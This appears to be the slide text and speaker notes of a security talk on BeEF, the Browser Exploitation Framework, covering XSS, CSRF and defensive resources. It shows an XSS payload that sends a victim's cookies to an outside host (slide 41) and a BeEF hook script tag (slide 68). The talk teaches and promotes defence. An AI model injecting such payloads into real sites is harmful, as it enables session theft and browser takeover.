BeEF: The Browser Exploitation Framework

  1. It’s 10pm, do you know where your browser is? Christian @xntrik Frichot
     Notes: Hi - I’m Christian ..
  2. (no text on slide)
     Notes: SCARY
  3. (no text on slide)
     Notes: Cute ;)
  4. Enhancing Lives
     Notes: Why are we here?
  5. I <3 U
     Notes: And we lurve the Internet
  6. >=] <3 U
     Notes: But so do bad-guys
  7. Online Banking
  8. Online Bank Robbery
     Notes: Way easier these days..
  9. Online Communication
  10. Online Romance
  11. Online Heart Robbery
     Notes: Way easier.
  12. (no text on slide)
     Notes: Sad?
  13. (no text on slide)
     Notes: Sadder!
  14. Browsers & Web Apps
     Notes: But this is what we’re talking about..
  15. Browser
     Notes: Browsers
  16. Web Apps
     Notes: Web apps
  17. (no text on slide)
     Notes: OVERVIEW
  18. (1) The Ubiquitous Web & its Imperfect Trust Model
  19. (2) Malicious Actors Do Malicious Things
  20. (3) You already deploy defences (even if you don’t know it). Let’s bolster them
  21. Ubiquitous
     Notes: The Internet is pervasive and ubiquitous
  22. (no text on slide)
     Notes: People who ‘support’ the ecosystem are multiplying
  23. Lots of people. Lots of browsers.
     Notes: Lots of attack surface
  24. !eCommerce / Commerce!
     Notes: Why?
  25. (no text on slide)
     Notes: Attackers don’t care, just seeing victims.
  26. (no text on slide)
     Notes: But it’s broken
  27. (no text on slide)
     Notes: What does this mean?
  28. (no text on slide)
     Notes: So how is my mum meant to know that this doesn’t mean the same thing?? http://www.usablesecurity.org/papers/jackson.pdf
  29. (no text on slide)
     Notes: Yup .. a fake frame inside someone else’s site..
  30. Domains are mixed
  31. (no text on slide)
     Notes: Traditional security models just don’t work in this new age.
  32. Bell-LaPadula ?
  33. Same Origin Policy
     Notes: Closest we have?
  34. (no text on slide)
     Notes: In the end though .. The browser will do what the server says. The server will do what the browser says.
  35. It’s Mighty (confusing)
     Notes: The browser is mighty - and it’s used by all of us ...
  36. (no text on slide)
     Notes: and it’s confusing..
  37. So just how bad is the bad stuff the bad people do?
  38. (no text on slide)
     Notes: OWASP, the Open Web Application Security Project, try to categorise the top 10 riskiest web security weaknesses. Known as the OWASP Top 10 it’s a great resource.. www.owasp.org
  39. Cross Site Scripting (XSS)
     Notes: In the OWASP Top 10 this comes in at number 2, and they describe it as so: “XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content”
  40. Server code:
     1. Take the ‘greeting’ parameter: page.php?greeting=<input>
     2. Dynamically print that out in the response: <p><?php echo $_GET['greeting'] ?></p>
  41. What if greeting was: <script>img=new Image();img.src="http://frichot.com/nom.php?cookie="+document.cookie;</script>
  42. Words < Picture < Moving Picture
  43. Demo
  44. (no text on slide)
  45. Cross Site Request Forgery (CSRF)
     Notes: CSRF comes in at number 5 in the OWASP Top 10.. described as: “Since browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.”
  46. (no text on slide)
  47. ING Direct
     Notes: https://www.eecs.berkeley.edu/~daw/teaching/cs261-f11/reading/csrf.pdf (2008)
  48. Without prior knowledge of secret or random tokens
  49. If you were online performing banking
  50. And your browser rendered content from elsewhere
  51. They could automatically transact your funds away
  52. (no text on slide)
  53. GET request to Add New Contact page
     POST request to add the contact
     POST request to confirm the new contact
     POST request to create payment to contact
     POST request to confirm payment
  54. (no text on slide)
  55. Samy Wanted Friends
  56. (no text on slide)
  57. This is lovely, but this is manual
     Notes: This all seems very hands on..
  58. http://beefproject.com
     Notes: Let me introduce you to BeEF.... The Browser Exploitation Framework ..
  59. (no text on slide)
     Notes: The architecture looks a little bit like this.
  60. (no text on slide)
     Notes: BeEF is currently made up of 3 main components: Core, Extensions & Modules (image: http://img4.cookinglight.com/i/2009/01/0901p40f-beef-patty-m.jpg?300:300)
  61. (no text on slide)
     Notes: Firstly is the core.. (image: http://www.imdb.com/media/rm1627756544/tt0298814)
  62. CORE: Hooking methods; Central API for Extensions & Modules; Filters; Database models; Primary client-side JS; Ruby extensions; Server-side asset handling; Web servicing
     Notes: The Core
     - Central API
     - Filters
     - Primary client-side javascript
     - Server-side asset handling and web servicing
     - Ruby extensions
     - Database models
     - Hooking methods to load and manage arbitrary extensions and command modules
  63. Extensions
     Notes: Extensions
  64. EXTENSIONS: Web UI; XSSRays; Console; Proxy/Requester; Demo pages; Metasploit; Event handling; Browser initialisation
  65. (no text on slide)
     Notes: Command Modules (image: http://www.mobiinformer.com/wp-content/uploads/2010/11/big_red_button.jpg)
  66. COMMAND MODULES: Recon; Browser; Persistence; Debugging; Network; Host; Router; Miscellaneous
  67. Hooking Browsers
     • XSS
     • Social Engineering (i.e. tiny URL, or phishing via email)
     • Embedding the payload (think drive-by-download)
     • Maintaining persistence after already being hooked (think Tab BeEF Injection)
  68. <script src="http://beefserver.com/hook.js"></script>
     Notes: This is pretty much all you need.
  69. Demo
  70. (no text on slide)
  71. (no text on slide)
     Notes: You can defend yourself
  72. www.OWASP.org
     Notes: Have LOTS of material
  73. Multiple angles (angels?)
  74. (no text on slide)
     Notes: As a minimum ..
  75. Your Baseline, Your Appetite
     Notes: Determine your appetite and baseline
  76. Update Your Frameworks
     Notes: Use the latest versions of your framework, Rails, Django, .NET (MVC)
  77. Monitor: http://www.ossec.net/ http://sucuri.net/
  78. Be Prepared: http://tiny.cc/rubygemsresponse
  79. Want Moar?
  80. Dev Lifecycle + Security: http://microsoft.com/sdl
  81. Continuous Security
  82. Brakeman: http://brakemanscanner.org/docs/presentations/
  83. Twitter: http://www.slideshare.net/xplodersuv/putting-your-robots-to-work-14901538
     Mozilla: https://air.mozilla.org/minion-automating-security-for-developers/
     Facebook: http://www.slideshare.net/mimeframe/ruxcon-2012-15195589
  84. You are not alone
  85. Questions? www.asteriskinfosec.com.au @asteriskinfosec @xntrik